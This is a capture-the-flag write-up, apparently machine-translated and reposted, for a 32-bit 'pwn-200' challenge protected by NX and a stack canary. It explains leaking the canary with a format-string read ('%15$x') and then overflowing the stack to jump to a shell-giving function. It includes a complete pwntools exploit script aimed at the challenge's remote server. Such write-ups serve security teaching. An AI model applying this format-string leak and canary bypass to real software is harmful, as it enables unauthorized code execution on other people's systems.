Pwn-pwn-200

Others 2019-10-31 13:31:11 views: null

Topic address ttp: //www.whalectf.xin/files/47a658e388a0c505fc07b6ee48a4a2e2/binary_200

 

32, opened the NX protection and Canary

 String vulnerability exists and stack overflow, made similar title, address jump

 Printf idea of ​​using the leaked value canary, and after refilling in, and then stack overflow calls the system function to get shell

Check string offset, byte offset 5

 And determining the input parameters to the address canary

 0x2c-0x4=0x28   0x28/4=10    10+5=15

 

Offset leak know, you can stack overflow

exp follows

from pwn import *
r=remote('bamboofox.cs.nctu.edu.tw',22002)

e=ELF('./binary_200')
flag_addr=e.symbols['canary_protect_me']
#flag_addr=0x804854d

r.sendline('%15$x')
canary=int(r.recv(), 16)

payload='a'*0x28+p32(canary)+'a'*0xc+p32(flag_addr)
r.sendline(payload)

r.interactive()

 

Guess you like

Origin www.cnblogs.com/gaonuoqi/p/11770554.html
pwn
Recommended
Arc Browser for Windows 1.0 officially GA
A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!
Ranking
1. Select Sort
Create a thread thread
3 press to play ball that reach 6
Programmation CUDA (4) : gestion de la mémoire
SpringBoot database connection pool Druid error
E Diudiu App redesign summary
4EVERLAND Hosting now supports SNS+IPFS
About HTTPS
[vue3+vite+ts+element-plu+sass] uses bug records in sass
Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling
Daily
More
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)

Code World

© 2018 codetd.com